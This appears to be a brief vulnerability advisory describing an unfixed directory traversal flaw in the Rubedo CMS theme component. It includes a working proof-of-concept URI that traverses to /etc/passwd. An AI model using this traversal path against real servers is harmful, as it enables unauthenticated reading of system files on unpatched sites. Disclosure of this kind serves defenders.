Rubedo is vulnerable Directory Traversal in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path
domain.com/theme/default/img/%2e%2e/..//etc/passwd URI.
issue not fixed yet in an official release
https://github.com/maroueneboubakri/CVE/tree/master/rubedo-cms
14 days trial , No credit card upfront , Risk free